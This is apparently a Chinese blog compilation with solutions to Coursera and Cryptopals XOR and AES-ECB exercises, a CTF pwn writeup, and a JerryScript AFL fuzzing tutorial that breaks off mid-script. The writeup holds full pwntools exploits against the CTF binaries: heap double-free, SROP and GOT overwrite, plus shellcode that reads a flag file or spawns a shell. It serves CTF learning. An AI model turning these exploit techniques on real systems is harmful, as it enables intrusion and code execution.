包含关键字 Go 的文章

题目一

地址：https://www.coursera.org/learn/crypto/assignment-submission/KZ9js/week-1-programming-assignment-optional/attempt

题目使用同一个流密码密钥加密得到 10 个密文，加密方式是逐字节异或，目标是通过这 10 个密文得到密钥以解出第 11 个密文。

已知消息 M、密钥 K，异或加密的过程是

$$ C=M\oplus K $$

得到密文 C。异或是自反的运算，所以解密与加密过程相同

$$ M=C\oplus K $$

对于同一个密钥 K 加密的两个密文 C_1、C_2，如果将两者异或可以得到

$$ B=C_1\oplus C_2=M_1\oplus K\oplus M_2\oplus K=M_1\oplus M_2 $$

字节流B是两消息逐字节异或结果。

我们首先导入这些密文和加密方法

msg_1 = bytes.fromhex('315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e')
msg_2 = bytes.fromhex('234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f')
msg_3 = bytes.fromhex('32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb')
msg_4 = bytes.fromhex('32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa')
msg_5 = bytes.fromhex('3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070')
msg_6 = bytes.fromhex('32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4')
msg_7 = bytes.fromhex('32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce')
msg_8 = bytes.fromhex('315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3')
msg_9 = bytes.fromhex('271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027')
msg_10 = bytes.fromhex('466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83')

msg_target = bytes.fromhex('32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904')

msgs = [msg_1, msg_2, msg_3, msg_4, msg_5, msg_6, msg_7, msg_8, msg_9, msg_10]

def bytesxor(a, b):
    if len(a) > len(b):
       return bytes([x ^ y for (x, y) in zip(a[:len(b)], b)])
    else:
       return bytes([x ^ y for (x, y) in zip(a, b[:len(a)])])

根据前文理论，我们先尝试异或 msg_1 和 msg_2，结果是

b'\x12\x10L\x06\x13NW\t\x14\x0f\x10O\x02R\x1b\n\x04B\x02\x0cM\x07\x0b\x18OH\x15T\x1f\x08\x00HN\x1e\x02A\x06\x1d\x06MT\x0b\n\x02\x02\x10\x19E\x10\x16MO:\x00SC\x00NC\x0e\x1e\x1d\nRF\x12\x17\x1b\x01\x17\x00\x1b\x0eEC\x1c\x0c\x1d\x16\nR\r\x11tN\x19\x06\x1a\x11M\x0eU\x17O\x08NT7\x14\x05\x0b\x17CST\x1bH\x07\x0e\x00\x0eM'

我们不使用十六进制格式输出，是因为需要观察其中有一些大写或小写英文字母。根据题目，明文是 ASCII 英语句子，其中大部分符号都是大小写英文字母和空格。我们需要知道一个特殊的规律

$$ ASCII(大/小写字母)\oplus ASCII(空格)=ASCII(小/大写字母) $$

即英文字母的 ASCII 值与空格的 ASCII 值异或得到的 ASCII 值相当于切换原字母的大小写。

根据以上规律，我们十个中的一个密文 C，与其余九个密文逐字节异或，得到九个字节流 B_i，观察其中相同索引 j（位置）的字节 b_k，如果这九个字节几乎都是英文字母，那么我们选取的密文 C 的索引 j 处的字节 C[j] 的明文就大概是空格。此时我们有

$$ C[j]\oplus ASCII(空格)=K[j] $$

从而有可能还原出一个字节的密钥。如果密文足够多足够长，重复上述过程可以还原完整的密钥。

key = [0] * len(msg_7) # `msg_7` is the longest ciphertext.

def isalpha(b):
    return (ord('a') <= b <= ord('z')) or (ord('A') <= b <= ord('Z'))

for i, msg_i in enumerate(msgs):
    may_not_space = [0] * len(msg_i) # Count cases when b_k is not alphabetic.
    for j, msg_j in enumerate(msgs):
        if i != j:
            xored = bytesxor(msg_i, msg_j)
            for k, xb in enumerate(xored):
                if (not isalpha(xb)) and xb != 0:
                    may_not_space[k] += 1
    
    for j, may_not in enumerate(may_not_space):
        if may_not <= 2: # If almost all b_k are alphabetic
            key_byte = msg_i[j] ^ ord(' ')
            if key[j] == 0:
                key[j] = key_byte
                continue
            
            if key[j] != key_byte: # Detect contradiction. Do more checks.
                reliable = True
                for m in msgs:
                    if j >= len(m):
                        continue
                    byte = m[j] ^ key_byte
                    if not isalpha(byte) and byte != ord(' '):
                        reliable = False
                        break
                if reliable:
                    key[j] = key_byte

print(f'Recovered key: {key}')
print(f'Target message: {bytesxor(bytes(key), msg_target)}'')
# for msg in msgs:
#     print(bytesxor(msg, bytes(key)))

题目二

地址：https://www.cryptopals.com/sets/1

1. Convert hex to base64

from base64 import b64encode

print(b64encode(bytes.fromhex('49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d')).decode())

2. Fixed XOR

def bytesxor(a, b):
    if len(a) > len(b):
       return bytes([x ^ y for (x, y) in zip(a[:len(b)], b)])
    else:
       return bytes([x ^ y for (x, y) in zip(a, b[:len(a)])])

print(bytesxor(bytes.fromhex('1c0111001f010100061a024b53535009181c'), bytes.fromhex('686974207468652062756c6c277320657965')).hex())

3. Single-byte XOR cipher

突发奇想，这里我用《动物森友会》给信件评分的算法来判断哪个结果最正确。（还真没毛病

def get_score(message: str) -> int:
    """*Animal Crossing* message scoring algorithm."""
    t = set("abl abo abr abs acc ach acr act add adm adv aer aff afr aft aga age ago ahe air ali all alm alo alr als alt alw am  ame amo and ang ani ano ans any apa app apr are arg arm arr art asi ask asl ate atm att aud aug aut ave avo awa cak cal cam can cap car cas cat cau cen cer cha che chi cho chi chu cir cit cla cle cli clo coa cof coi col com con coo cop cor cos cou cov cow cre cri cro cry cup cur cus cut bab bac bad bag bal ban bas bat be  bea bec bed bee bef beg beh bel bes bet bey bic big bik bil bir bit bla ble blo blu boa bod bon boo bor bot bou box boy bra bre bri bro bui bur bus but buy by  eac ear eas eat edu eff egg eig eit ele els emp end ene eng enj eno ent equ err esp eur eve exa exc exe exp eye dad dai dam dan dar dat dau day dea dec dee def deg del dem den dep des det dev dic did die dif dig din dir dis div do  doc doe dog dol don doo dou dow doz dra dre dri dro dru dry due dur dus dut gai gam gar gas gat gav gen ger get gir giv gla go  god goi gon goo got gov gra gre gro gua gue gui gun fac fai fal fam far fas fat fea feb fed fee fel few fie fif fig fil fin fir fis fiv fix fla fle fli flo fly fol foo for fou fra fre fri fro fru ful fun fut i   ice ide if  ima imm imp in  inc ind inf ins int inv iro is  isl it  its hab had hai hal han hap har has hat hav he  hea hei hel her hi  hid hig hil him hir his hit hol hom hon hop hor hos hot hou how hum hun hur hus kee kep key kic kil kin kit kne kni kno kab kad kai kak kan kar kas kat kau kaw kay kaz kea ked kef keg ken kes ket kev kib kie kif kig kik kim kin kis kit kiv koc kon koo kos kot kou kov kow kun kyi kac kad kag kai kaj kak kan kap kar kat kay ke  kea ked kee kem ken kes ket kid kig kil kin kis kod kom kon koo kor kos kot kou kov kuc kum kus ky  kys kam kar kat kea kec kee kei kev kew kex kic kig kin ko  kob koi kon koo kor kos kot kov kow kum kbj k'c kct kf  kff kft kh  kil kka kld kn  knc kne knl kpe kpi kpp kr  kra krd kth kur kut kve kwn jan jap job joi jud jul jum jun jus qua que qui pac pag pai pap par pas pat pay pea pen peo per pho pic pie pin pip pla ple poc poi pol poo pop pos pot pou pow pra pre pri pro pub pul pup pur pus put sad saf sai sal sam san sat sav saw say sce sch sci sco sea sec see sel sen sep ser set sev sex sha she shi sho shu sic sid sig sil sim sin sis sit six siz ski sky sle sli slo sma sme smi smo sno so  soa soc sof soi sol som son soo sor sou spa spe spi spo spr squ sta ste sti sto str stu sty sub suc sud suf sug sum sun sup sur swa swe swi swu sys rac rad rai ran rap rat rea rec red ref reg rel rem rep req res ret ric rid rig rin ris riv roa roc rod rol roo ros rou row rul run rus una unc und uni unl unt up  upo us  use usu tab tak tal tas tau tax tea tee tel tem ten ter tes tha the thi tho thr thu tic tie til tim tir tit to  tod tog tol tom ton too top tor tot tou tow tra tre tri tro tru try tue tur tv  twe twi two tyi typ val var veg ver vie vil vis voi vol vot vai vak val van var vas vat vav vay ve  vea ved vee vei vel ven ver ves vet vha vhe vhi vho vhy vid vif vil vin vir vis vit viv vok vom von voo vor vou vri vro vma yar yea yel yen yes yet you zer".split())
    s = 0
    if message and message[-1] in '.?!':
        s += 20
    for i, c in enumerate(message):
        if c in '.?!':
            for j in range(i+1, min(i+4, len(message))):
                if message[j].isupper():
                    s += 10
                    break
                elif message[j].isalpha():
                    s -= 10
                    break
    s += sum(3 for w in message.split() if len(cw :=
             ''.join(c for c in w if c.isalpha()).lower()) >= 3 and cw[:3] in t)
    for c in message:
        if not c.isspace():
            s += 20 if c.isupper() else -10
            break
    for i in range(len(message)-2):
        if message[i].isalpha() and message[i] == message[i+1] == message[i+2]:
            s -= 50
            break
    sp, nsp = message.count(' '), len(message) - message.count(' ')
    s += -20 if nsp == 0 or (sp * 100 // nsp if nsp else 0) < 20 else 20
    if len(message) > 75:
        c = 0
        for ch in message:
            c = 0 if ch in '.?!' else c + 1
            if c == 75:
                s -= 150
                break
    s -= sum(20 for i in range(0, len(message), 32)
             if ' ' not in message[i:i+32] and len(message[i:i+32]) == 32)
    return s


cipher = bytes.fromhex(
    '1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736')
results = list()
for c in range(256):
    try:
        res = bytesxor((chr(c) * len(cipher)).encode(), cipher).decode()
        results.append((res, get_score(res)))
    except UnicodeDecodeError:
        pass

best = sorted(results, key=lambda x: x[1])[-1][0]
print(best)

# Cooking MC's like a pound of bacon

4. Detect single-character XOR

with open('4.txt', 'r') as file:
    ciphers = file.readlines()

for original_cipher in ciphers:
    results = list()
    cipher = bytes.fromhex(original_cipher)
    for c in range(256):
        try:
            res = bytesxor((chr(c) * len(cipher)).encode(), cipher).decode()
            results.append((res, get_score(res)))
        except UnicodeDecodeError:
            pass
    if len(results) == 0:
        continue

    best = sorted(results, key=lambda x: x[1])[-1]
    if best[1] > 40:
        print(f'{original_cipher.strip()} -> {best[0]}')

# 7b5a4215415d544115415d5015455447414c155c46155f4058455c5b523f -> Now that the party is jumping

5. Implement repeating-key XOR

def repeating_key_xor_to_hex(msg: bytes, key: bytes) -> str:
    result_chars = []
    keylen = len(key)
    for i, b in enumerate(msg):
        result_chars.append(b ^ key[i % keylen])
    return bytes(result_chars).hex()

print(repeating_key_xor_to_hex(b"Burning 'em, if you ain't quick and nimble", b'ICE'))
print(repeating_key_xor_to_hex(b'I go crazy when I hear a cymbal', b'ICE'))

6. Break repeating-key XOR

一开始没有还原正确，检查了一下发现是 # 扰乱了解密评分。考虑到英文句子里极少有 #，所以遇到就扣 5 分。

from base64 import b64decode


def get_score(message: str):
    score = 0
    for c in message:
        if c.islower():
            score += 3
        if c.isupper():
            score += 1
        if c == ' ':
            score += 1
        if c == '#':
            score -= 5
    return score


def get_key(cipher: bytes) -> int:
    results = list()
    for c in range(256):
        try:
            res = bytesxor((chr(c) * len(cipher)).encode(), cipher).decode()
            results.append((c, get_score(res)))
        except UnicodeDecodeError:
            pass
    return sorted(results, key=lambda x: x[1])[-1][0]


def repeating_key_xor(msg: bytes, key: bytes) -> bytes:
    result_chars = []
    keylen = len(key)
    for i, b in enumerate(msg):
        result_chars.append(b ^ key[i % keylen])
    return bytes(result_chars)


def normalized_average_hd(data: bytes, unit_len: int) -> float:
    chunks = [data[i:i + unit_len] for i in range(0, len(data), unit_len)]
    num_chunks = len(chunks)
    total_hd = 0
    count = 0
    for i in range(num_chunks):
        for j in range(i + 1, num_chunks):
            if len(chunks[i]) == unit_len and len(chunks[j]) == unit_len:
                total_hd += sum((byte1 ^ byte2).bit_count()
                                for byte1, byte2 in zip(chunks[i], chunks[j]))
                count += 1
    return total_hd / (count * unit_len)


with open('6.txt', 'r') as file:
    cipher = b64decode(file.read())

results = list()
for l in range(2, 41):
    norm_hd = normalized_average_hd(cipher, l)
    results.append((l, norm_hd))
keylens = sorted(results, key=lambda x: x[1])

for k in range(1):
    keylen = keylens[k][0]
    print(f"Guessed key length: {keylen}")

    key_bytes = []
    for i in range(keylen):
        block = bytes([cipher[j * keylen + i]
                      for j in range(len(cipher) // keylen)])
        key_bytes.append(get_key(block))

    key = bytes(key_bytes)
    # print(repeating_key_xor(cipher, key).decode())
    print(f'Key: {key}')

# Guessed key length: 29
# Key: b'Terminator X: Bring the noise'

7. AES in ECB mode

import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms

key = b"YELLOW SUBMARINE"
with open('7.txt', 'r') as f:
    encrypted_b64 = f.read()
encrypted_data = base64.b64decode(encrypted_b64)
cipher = Cipher(algorithms.AES(key)) # Default to ECB mode
decryptor = cipher.decryptor()
decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()

print(decrypted_data.decode())

8. Detect AES in ECB mode

print(max(open('8.txt').read().splitlines(), key=lambda x: len(c:=[x[i:i+32] for i in range(0, len(x), 32)]) - len(set(c))))

羊城杯 2025 初赛 Pwn Writeup

作者: rik
时间: 2025-10-16
分类: 二进制安全
评论

malloc

自定义堆内存管理器。

堆块结构：

| Offset | Field          | Description                        |
|---------|----------------|------------------------------------|
| +0      | in_use (1B)    | 1 = allocated, 0 = free            |
| +1..7   | padding        | for 8-byte alignment               |
| +8      | size (4B)      | total size of the chunk            |
| +12..15 | padding        | (align next pointer)               |
| +16     | next (8B)      | pointer to next free chunk         |
| +16     | user data start| returned to caller (malloc result) |

delete 时存在 UAF，且 double free 检测深度只有 13，而我们最多可以申请 16 个堆块。double free 后再多次 create 得到重叠堆块，修改 next 指针得到任意地址（目标地址 - 16）分配，从而任意地址读写。

泄露 libc、stack 基地址后任意分配到栈上写 ROP，返回至提前布置好的 shellcode。程序沙箱禁用 execve 等系统调用，考虑 orw。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='info')
binary = './pwn'
# io = process(binary)
io = connect('45.40.247.139', 18565)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)

# 0x0f < size <= 0x70
def create(index: int, size: int):
    io.sendlineafter(b'=======================\n', b'1')
    io.sendlineafter(b'Index\n', itob(index))
    io.sendlineafter(b'size\n', itob(size))

def delete(index: int):
    io.sendlineafter(b'=======================\n', b'2')
    io.sendlineafter(b'Index\n', itob(index))

def edit(index: int, size: int, content: bytes):
    io.sendlineafter(b'=======================\n', b'3')
    io.sendlineafter(b'Index\n', itob(index))
    io.sendlineafter(b'size\n', itob(size))
    io.send(content)

def show(index: int):
    io.sendlineafter(b'=======================\n', b'4')
    io.sendlineafter(b'Index\n', itob(index))

def exitit():
    io.sendlineafter(b'=======================\n', b'5')

for i in range(15):
    create(i, 0x10)
for i in range(15):
    delete(i)
delete(0) # double free
show(14) # leak heap (elf)
e.address = u64(io.recvline(False).ljust(8, b'\x00')) - 0x53a0
print_leaked('elf_base', e.address)
create(0, 0x10)
edit(0, 8, p64(e.sym['stdout'] - 16)) # `next` -> stdout
for _ in range(16):
    create(1, 0x10)
show(1)
libc.address = u64(io.recvline(False).ljust(8, b'\x00')) - 0x21b780
print_leaked('libc_base', libc.address)

for i in range(15):
    create(i, 0x20)
for i in range(15):
    delete(i)
delete(0) # double free
create(0, 0x20)
edit(0, 8, p64(libc.sym['environ'] - 16)) # `next` -> environ
for _ in range(16):
    create(1, 0x20)
show(1)
stack_addr = u64(io.recvline(False).ljust(8, b'\x00'))
print_leaked('stack_addr', stack_addr)

for i in range(15):
    create(i, 0x70)
for i in range(15):
    delete(i)
delete(0) # double free
create(0, 0x70)
edit(0, 8, p64(stack_addr - 0x140 - 16)) # `next` -> stack retaddr
for _ in range(16):
    create(1, 0x70)
# gdb.attach(io, 'b *$rebase(0x18F2)')
edit(0, 0x70, asm(f"""
    mov rax, 0x67616c662f
    push rax

    mov rax, __NR_open
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    syscall

    mov rax, __NR_read
    mov rdi, 3
    mov rsi, rsp
    mov rdx, 0x50
    syscall

    mov rax, __NR_write
    mov rdi, 1
    mov rsi, rsp
    mov rdx, 0x50
    syscall
"""))
edit(1, 0x70, flat([
    libc.search(asm('pop rdi;ret')).__next__(),
    e.address + 0x5000,
    libc.search(asm('pop rsi;ret')).__next__(),
    0x1000,
    libc.search(asm('pop rdx;pop r12;ret')).__next__(),
    7,
    0,
    libc.sym['mprotect'],
    e.address + 0x56c0
]))

io.interactive()

stack

看起来是堆溢出但其实会栈迁移到堆上，溢出改返回地址爆破 PIE 到 magic。

由于随机数种子来自已知时间，所以可以预测随机数，逆运算得到 PIE 基地址。

最后栈迁移到 bss 段，利用 SROP 和 syscall gadget 实现任意系统调用。程序 seccomp 沙箱禁用了 open、execve 等系统调用，考虑 openat 替代。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'])
binary = './Stack_Over_Flow'
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)

while True:
    global io, elf_base
    io = connect('45.40.247.139', 30871)
    libc_lib = CDLL('/usr/lib/libc.so.6')
    libc_lib.srand(libc_lib.time(0))
    libc_lib.rand() % 5
    libc_lib.rand() % 5
    key = libc_lib.rand() % 5
    try:
        io.sendafter(b'luck!\n', cyclic(0x2000)[:cyclic(0x2000).index(b'qaacraac')] + b'\x5F\x13')
        
        if b'magic' not in io.recvuntil(b':'):
            io.close()
            continue
        e.address = (int(io.recvline(False)) // key) - 0x16b0
        break
    except Exception:
        io.close()
        continue

context.log_level = 'debug'

print_leaked('elf_base', e.address)

syscall = e.address + 0x000000000000134f
fake_stack = e.bss(0x800)

# stack mig
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = fake_stack
frame.rdx = 0x800
frame.rip = syscall
frame.rsp = fake_stack

# gdb.attach(io, 'b *$rebase(0x16A4)')
io.sendafter(b'luck!\n', flat([
    cyclic(0x100),
    0,
    syscall,
    0,
    syscall,
    bytes(frame)
]))
pause()
io.send(cyclic(0xf))

# mprotect
frame = SigreturnFrame()
frame.rax = 10
frame.rdi = fake_stack & ~0xfff
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = syscall
frame.rsp = fake_stack + 0x200

xor_rax_pop_rbp = e.address + 0x00000000000016a0

payload = flat([
    0,
    xor_rax_pop_rbp,
    0,
    syscall,
    0,
    syscall,
    bytes(frame)
])
payload = payload.ljust(0x200, b'\x00')
payload += flat([
    0,
    fake_stack + 0x300
])
payload = payload.ljust(0x300, b'\x00')
payload += asm("""
    push 0x50
    lea rax, [rsp - 0x60]
    push rax

    mov rax, 0x67616c662f
    push rax

    push __NR_openat ; pop rax
    xor rdi, rdi
    push rsp ; pop rsi
    xor rdx, rdx
    xor r10, r10
    syscall
    push rax

    push __NR_readv ; pop rax
    pop rdi
    popf
    push rsp ; pop rsi
    push 1 ; pop rdx
    syscall

    push __NR_writev ; pop rax
    push 1 ; pop rdi
    syscall
""")
pause()
io.send(payload)
pause()
io.send(cyclic(0xf))

io.interactive()

mvmps

参考软件系统安全赛 - vm。

00000000 struct __attribute__((packed)) __attribute__((aligned(1))) VM // sizeof=0x49
00000000 {
00000000     char *vmcode;
00000008     int pc;
0000000C     int field_C;
00000010     __int64 regs[6];
00000040     int64_t sp;
00000048     BYTE field_48;
00000049 };

SUB SP 时栈指针下溢，PUSH 和 POP 操作变成 ELF 几乎任意地址读写。

不是 PIE，劫持 GOT 即可。读取 read@got 低 4 字节，减去偏移得到 system 地址，将其写回 read@got 低 4 字节，内存中写入 "sh"，执行 read 并传入首个参数为 "sh" 地址。指令有四种格式。具体见下方 exp 注释。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './vvmm'
# io = process(binary)
io = connect('45.40.247.139', 15101)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)
# gdb.attach(io, 'b *0x401CBF\nb *0x4015AA\nb *0x401CC6\nb *0x402742\nb *0x4025E7\nb *0x4014AF\nb *0x4015CE')

def INST(opcode: int, type: int, *args) -> bytes:
    header = p8(opcode << 2 | type)
    if type == 0:
        return header + p8((args[0] & 0xff0000) >> 16) + p8((args[0] & 0xff00) >> 8) + p8(args[0] & 0xff)
    if type == 1:
        return header + p8(args[0])
    if type == 2:
        return header + p8(args[0]) + p8(args[1])
    if type == 3:
        return header + p8(args[0]) + p32(args[1])
    raise ValueError("Invalid type.")

io.sendafter(b'Please input your opcodes:\n', b''.join([
    INST(0x24, 0, 0x418), # SUB SP (to read@got)
    INST(0x20, 1, 0), # read from elf (read@got)
    INST(0xb, 3, 0, 0xc3a60), # REG SUB (offset of read & system)
    INST(0x1f, 1, 0), # write to elf (system)
    INST(0x3, 3, 1, 0x6873), # LOAD IMM ("sh")
    INST(0x25, 0, 0x30), # ADD SP (arbitrary mem)
    INST(0x1f, 1, 1), # write to elf ("sh")
    INST(0x3, 3, 0, 0x4050fc), # LOAD IMM (arbitrary mem)
    INST(0x33, 0, 0), # SYSCALL (read@plt -> system with arg "sh")
]))

io.interactive()

开始之前

这段时间本来想入门 Chrome V8，学了一段时间发现 V8 还是太吃操作了……感觉应该先了解下比较简单的 JS 引擎。于是想着先从适合嵌入式设备的轻量 JS 引擎 JerryScript 开始玩起。正好看到 JerryScript 的 Issues 有好多关于漏洞的报告~~（无人在意说是）~~，那就复现一下 fuzzing 漏洞挖掘吧。

源码与编译

git clone https://github.com/jerryscript-project/jerryscript
cd jerryscript
python tools/build.py

编译 JerryScript 还是相当简单的，要想 fuzz 它，我们可以直接让 AFL 将文件作为参数传入然后等待崩溃。但是这样的 fuzz 是没有意义的，因为没有经过 AFL instruction。我们需要使用 afl-clang-lto 作为编译器。有关 AFL 的用法和原理，前人之述备矣，我就不赘述了。

JerryScript 已经在 tools/build.py 为我们准备好了接入 libfuzzer 的编译选项，而 AFL 支持为 libfuzzer sanitized binary 启用 persistent mode。那么就用现成的就好。

CC=afl-clang-lto python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum-conversion' --strip=OFF
CC=afl-clang-lto AFL_LLVM_CMPLOG=1 python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum  
-conversion -fsanitize=address' --strip=OFF

我们需要添加 -Wno-enum-enum-conversion 编译参数来防止高版本 clang 编译不通过。（如果要用高版本 gcc 编译的话，还需要添加 -Wno-unterminated-string-initialization，因为 jerry-core/ecma/builtin-objects/ecma-builtin-helpers-date.c 中的 day_names_p 和 month_names_p 没有考虑 C-style 字符串字面量 tailing NULL byte 占用的空间。）

准备初始 corpus

作为实验，我没有考虑太多，选用 test262 作为 JS 样本，去除其中的注释，就直接作为初始 corpus 了。我选用 AFL 作为 fuzzing 引擎。这对于 JS 引擎而言，效果不会好，但本来也只是实验性质的尝试。AFL 在 fuzz 过程中会根据这些文件不断通过各种策略构造新的输入，收集对于每个输入程序执行后的覆盖率，继续构造新的输入。

import os
import shutil
import subprocess

TEST262_REPO = "https://github.com/tc39/test262.git"
CLONE_DIR = "test262"
CORPUS_DIR = "corpus"
NUM_FILES = 100  # Adjust how many files you want

# Directories considered ES5 core tests
ES5_TEST_DIRS = [
    "test/built-ins",
    "test/language",
    "test/statements",
    "test/annexB"
]

def clone_test262():
    if not os.path.exists(CLONE_DIR):
        print("Cloning test262 repo...")
        subprocess.run(["git", "clone", TEST262_REPO], check=True)
    else:
        print("test262 repo already cloned.")

def gather_es5_js_files():
    js_files = []
    for root, _, files in os.walk(CLONE_DIR):
        # Check if the file is inside one of the ES5 directories
        if any(es5_dir in root.replace("\\", "/") for es5_dir in ES5_TEST_DIRS):
            for file in files:
                if file.endswith(".js"):
                    js_files.append(os.path.join(root, file))
    return js_files

def prepare_corpus(js_files):
    os.makedirs(CORPUS_DIR, exist_ok=True)
    selected_files = js_files[:NUM_FILES]
    print(f"Copying {len(selected_files)} files to corpus directory...")
    existing_names = set()

    for path in selected_files:
        filename = os.path.basename(path)
        name, ext = os.path.splitext(filename)

        # Avoid duplicates by renaming with suffix if needed
        original_filename = filename
        suffix = 1
        while filename in existing_names:
            filename = f"{name}_{suffix}{ext}"
            suffix += 1

        existing_names.add(filename)
        shutil.copy(path, os.path.join(CORPUS_DIR, filename))

    print("Corpus preparation complete.")

if __name__ == "__main__":
    clone_test262()
    all_js_files = gather_es5_js_files()
    if len(all_js_files) == 0:
        print("No ES5 JS files found in test262 repo!")
    else:
        prepare_corpus(all_js_files)

fuzzing

afl-fuzz -i input -o output -b 2 -a text -M master -- ./jerry-libfuzzer
AFL_USE_ASAN=1 afl-fuzz -i input -o output -b 4 -a text -S sanitizer -c 0 -l 2AT -P exploit -p exploit -- ./jerry-libfuzzer

很快就发生了 crash。可以看到 AFL 构造的 JS 输入和乱码真的没区别了。也就是说 JerryScript 在语法分析甚至词法分析阶段就可能崩溃，发生段错误。

结果处理

虽然听起来有点离谱，但是挂机一天后 AFL 收集到了 543 个 crashes。但其中大多数都是 null pointer deref。所以我决定简单筛选一下无效的 crashes。使用 Python gdb 模块批量调试 crash inputs，段错误后先提取产生段错误位置的汇编指令，找到解引用 [reg + offset]（寄存器间接寻址）处使用的寄存器，然后再让 gdb 查询这个寄存器的值，如果值为很大的数则将这个 input 另存起来。

import gdb
import os
import shlex
import shutil
import re
from pathlib import Path

# ====== Configuration ======
CRASH_DIR = Path("./crashes")
VALID_DIR = Path("./valid")
LOG_DIR = Path("./logs")
MODE = "copy"   # "copy" or "link"
PATTERN = "cafebabe"   # if NOT found in crash bt/output -> save to VALID_DIR
USE_STDIN = False    # If True, run "run < file" to feed the file on stdin
# Note: timeouts are not enforced inside gdb-embedded script; if you need per-run
# timeouts, run gdb under an external timeout wrapper (e.g. GNU timeout) or use
# the external/python+subprocess approach.
# ===========================

CRASH_DIR = CRASH_DIR.resolve()
VALID_DIR = VALID_DIR.resolve()
LOG_DIR = LOG_DIR.resolve()

x86_64_registers = [
    "rax", "rbx", "rcx", "rdx",
    "rsp", "rbp", "rsi", "rdi",
    "r8", "r9", "r10", "r11",
    "r12", "r13", "r14", "r15"
]

for d in (VALID_DIR, LOG_DIR):
    d.mkdir(parents=True, exist_ok=True)

# helper: unique destination path (avoid overwriting)
def unique_dest(dest: Path) -> Path:
    if not dest.exists():
        return dest
    i = 1
    while True:
        candidate = dest.with_name(dest.name + f".{i}")
        if not candidate.exists():
            return candidate
        i += 1

def install_file(src: Path) -> Path:
    dest = VALID_DIR / src.name
    dest = unique_dest(dest)
